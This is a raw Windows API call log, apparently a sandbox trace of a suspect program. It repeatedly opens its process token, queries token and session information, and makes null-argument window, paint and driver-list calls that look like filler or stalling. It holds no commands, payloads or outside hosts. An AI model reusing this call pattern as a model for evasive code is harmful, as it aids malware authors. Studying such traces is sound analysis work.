[0072.320] GetTokenInformation (in: TokenHandle=0x588, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.320] GetLastError () returned 0x7a [0072.320] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.320] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.320] WTSFreeMemory (pMemory=0x0) [0072.320] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.320] TextOutW (hdc=0x0, x=2144, y=5124, lpString="", c=0) returned 1 [0072.320] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.320] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.321] GetTickCount () returned 0x1f2b7 [0072.321] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.322] SetForegroundWindow (hWnd=0x0) returned 0 [0072.322] BringWindowToTop (hWnd=0x0) returned 0 [0072.322] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x58c) returned 1 [0072.322] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.322] GetLastError () returned 0x7a [0072.322] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.322] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.322] WTSFreeMemory (pMemory=0x0) [0072.322] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.323] TextOutW (hdc=0x0, x=2154, y=5149, lpString="", c=0) returned 1 [0072.323] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.323] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.323] GetTickCount () returned 0x1f2b7 [0072.324] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.324] SetForegroundWindow (hWnd=0x0) returned 0 [0072.324] BringWindowToTop (hWnd=0x0) returned 0 [0072.324] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x590) returned 1 [0072.324] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.324] GetLastError () returned 0x7a [0072.324] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.324] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.325] WTSFreeMemory (pMemory=0x0) [0072.325] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.325] TextOutW (hdc=0x0, x=2164, y=5174, lpString="", c=0) returned 1 [0072.325] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.325] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.325] GetTickCount () returned 0x1f2b7 [0072.327] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.327] SetForegroundWindow (hWnd=0x0) returned 0 [0072.327] BringWindowToTop (hWnd=0x0) returned 0 [0072.327] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x594) returned 1 [0072.327] GetTokenInformation (in: TokenHandle=0x594, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.327] GetLastError () returned 0x7a [0072.327] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.327] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.328] WTSFreeMemory (pMemory=0x0) [0072.328] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.328] TextOutW (hdc=0x0, x=2174, y=5199, lpString="", c=0) returned 1 [0072.328] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.328] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.328] GetTickCount () returned 0x1f2b7 [0072.329] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.329] SetForegroundWindow (hWnd=0x0) returned 0 [0072.330] BringWindowToTop (hWnd=0x0) returned 0 [0072.330] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x598) returned 1 [0072.330] GetTokenInformation (in: TokenHandle=0x598, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.330] GetLastError () returned 0x7a [0072.330] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.330] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.330] WTSFreeMemory (pMemory=0x0) [0072.330] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.331] TextOutW (hdc=0x0, x=2184, y=5224, lpString="", c=0) returned 1 [0072.331] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.331] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.331] GetTickCount () returned 0x1f2b7 [0072.332] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.332] SetForegroundWindow (hWnd=0x0) returned 0 [0072.332] BringWindowToTop (hWnd=0x0) returned 0 [0072.332] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x59c) returned 1 [0072.332] GetTokenInformation (in: TokenHandle=0x59c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.332] GetLastError () returned 0x7a [0072.332] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.332] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.333] WTSFreeMemory (pMemory=0x0) [0072.333] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.333] TextOutW (hdc=0x0, x=2194, y=5249, lpString="", c=0) returned 1 [0072.333] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.333] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.333] GetTickCount () returned 0x1f2c7 [0072.334] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.334] SetForegroundWindow (hWnd=0x0) returned 0 [0072.334] BringWindowToTop (hWnd=0x0) returned 0 [0072.334] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5a0) returned 1 [0072.334] GetTokenInformation (in: TokenHandle=0x5a0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.334] GetLastError () returned 0x7a [0072.334] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.334] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.335] WTSFreeMemory (pMemory=0x0) [0072.335] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.335] TextOutW (hdc=0x0, x=2204, y=5274, lpString="", c=0) returned 1 [0072.335] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.335] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.335] GetTickCount () returned 0x1f2c7 [0072.336] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.336] SetForegroundWindow (hWnd=0x0) returned 0 [0072.336] BringWindowToTop (hWnd=0x0) returned 0 [0072.336] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5a4) returned 1 [0072.336] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.336] GetLastError () returned 0x7a [0072.336] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.336] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.337] WTSFreeMemory (pMemory=0x0) [0072.337] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.337] TextOutW (hdc=0x0, x=2214, y=5299, lpString="", c=0) returned 1 [0072.337] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.337] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.337] GetTickCount () returned 0x1f2c7 [0072.395] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.395] SetForegroundWindow (hWnd=0x0) returned 0 [0072.395] BringWindowToTop (hWnd=0x0) returned 0 [0072.395] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5a8) returned 1 [0072.395] GetTokenInformation (in: TokenHandle=0x5a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.395] GetLastError () returned 0x7a [0072.396] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.396] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.396] WTSFreeMemory (pMemory=0x0) [0072.396] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.396] TextOutW (hdc=0x0, x=2224, y=5324, lpString="", c=0) returned 1 [0072.396] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.396] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.396] GetTickCount () returned 0x1f306 [0072.402] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.403] SetForegroundWindow (hWnd=0x0) returned 0 [0072.403] BringWindowToTop (hWnd=0x0) returned 0 [0072.403] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5ac) returned 1 [0072.403] GetTokenInformation (in: TokenHandle=0x5ac, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.403] GetLastError () returned 0x7a [0072.403] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.403] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.404] WTSFreeMemory (pMemory=0x0) [0072.404] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.404] TextOutW (hdc=0x0, x=2234, y=5349, lpString="", c=0) returned 1 [0072.404] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.404] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.404] GetTickCount () returned 0x1f306 [0072.405] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.405] SetForegroundWindow (hWnd=0x0) returned 0 [0072.405] BringWindowToTop (hWnd=0x0) returned 0 [0072.405] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5b0) returned 1 [0072.405] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.405] GetLastError () returned 0x7a [0072.405] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.405] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.406] WTSFreeMemory (pMemory=0x0) [0072.406] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.406] TextOutW (hdc=0x0, x=2244, y=5374, lpString="", c=0) returned 1 [0072.406] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.406] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.406] GetTickCount () returned 0x1f306 [0072.412] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.412] SetForegroundWindow (hWnd=0x0) returned 0 [0072.412] BringWindowToTop (hWnd=0x0) returned 0 [0072.412] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5b4) returned 1 [0072.412] GetTokenInformation (in: TokenHandle=0x5b4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.412] GetLastError () returned 0x7a [0072.412] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.412] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.413] WTSFreeMemory (pMemory=0x0) [0072.413] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.413] TextOutW (hdc=0x0, x=2254, y=5399, lpString="", c=0) returned 1 [0072.413] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.413] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.413] GetTickCount () returned 0x1f315 [0072.414] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.414] SetForegroundWindow (hWnd=0x0) returned 0 [0072.414] BringWindowToTop (hWnd=0x0) returned 0 [0072.414] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5b8) returned 1 [0072.414] GetTokenInformation (in: TokenHandle=0x5b8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.414] GetLastError () returned 0x7a [0072.414] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.414] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.414] WTSFreeMemory (pMemory=0x0) [0072.414] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.415] TextOutW (hdc=0x0, x=2264, y=5424, lpString="", c=0) returned 1 [0072.415] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.415] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.415] GetTickCount () returned 0x1f315 [0072.415] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.415] SetForegroundWindow (hWnd=0x0) returned 0 [0072.415] BringWindowToTop (hWnd=0x0) returned 0 [0072.416] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5bc) returned 1 [0072.416] GetTokenInformation (in: TokenHandle=0x5bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.416] GetLastError () returned 0x7a [0072.416] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.416] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.416] WTSFreeMemory (pMemory=0x0) [0072.416] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.416] TextOutW (hdc=0x0, x=2274, y=5449, lpString="", c=0) returned 1 [0072.416] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.416] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.416] GetTickCount () returned 0x1f315 [0072.417] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.417] SetForegroundWindow (hWnd=0x0) returned 0 [0072.417] BringWindowToTop (hWnd=0x0) returned 0 [0072.417] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5c0) returned 1 [0072.417] GetTokenInformation (in: TokenHandle=0x5c0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.417] GetLastError () returned 0x7a [0072.417] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.417] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.418] WTSFreeMemory (pMemory=0x0) [0072.418] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.418] TextOutW (hdc=0x0, x=2284, y=5474, lpString="", c=0) returned 1 [0072.418] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.418] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.418] GetTickCount () returned 0x1f315 [0072.419] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.419] SetForegroundWindow (hWnd=0x0) returned 0 [0072.419] BringWindowToTop (hWnd=0x0) returned 0 [0072.419] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5c4) returned 1 [0072.419] GetTokenInformation (in: TokenHandle=0x5c4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.419] GetLastError () returned 0x7a [0072.419] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.419] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.420] WTSFreeMemory (pMemory=0x0) [0072.420] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.420] TextOutW (hdc=0x0, x=2294, y=5499, lpString="", c=0) returned 1 [0072.420] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.420] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.420] GetTickCount () returned 0x1f315 [0072.421] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.421] SetForegroundWindow (hWnd=0x0) returned 0 [0072.421] BringWindowToTop (hWnd=0x0) returned 0 [0072.421] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5c8) returned 1 [0072.421] GetTokenInformation (in: TokenHandle=0x5c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.421] GetLastError () returned 0x7a [0072.421] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.421] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.422] WTSFreeMemory (pMemory=0x0) [0072.422] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.422] TextOutW (hdc=0x0, x=2304, y=5524, lpString="", c=0) returned 1 [0072.422] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.422] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.422] GetTickCount () returned 0x1f315 [0072.423] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.423] SetForegroundWindow (hWnd=0x0) returned 0 [0072.423] BringWindowToTop (hWnd=0x0) returned 0 [0072.424] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5cc) returned 1 [0072.424] GetTokenInformation (in: TokenHandle=0x5cc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.424] GetLastError () returned 0x7a [0072.424] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.424] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.424] WTSFreeMemory (pMemory=0x0) [0072.424] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.424] TextOutW (hdc=0x0, x=2314, y=5549, lpString="", c=0) returned 1 [0072.424] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.424] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.425] GetTickCount () returned 0x1f315 [0072.426] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.426] SetForegroundWindow (hWnd=0x0) returned 0 [0072.426] BringWindowToTop (hWnd=0x0) returned 0 [0072.426] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5d0) returned 1 [0072.426] GetTokenInformation (in: TokenHandle=0x5d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.426] GetLastError () returned 0x7a [0072.426] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.426] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.427] WTSFreeMemory (pMemory=0x0) [0072.427] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.427] TextOutW (hdc=0x0, x=2324, y=5574, lpString="", c=0) returned 1 [0072.427] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.427] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.427] GetTickCount () returned 0x1f325 [0072.428] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.428] SetForegroundWindow (hWnd=0x0) returned 0 [0072.428] BringWindowToTop (hWnd=0x0) returned 0 [0072.428] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5d4) returned 1 [0072.428] GetTokenInformation (in: TokenHandle=0x5d4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.428] GetLastError () returned 0x7a [0072.428] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.428] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.429] WTSFreeMemory (pMemory=0x0) [0072.429] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.429] TextOutW (hdc=0x0, x=2334, y=5599, lpString="", c=0) returned 1 [0072.429] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.429] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.429] GetTickCount () returned 0x1f325 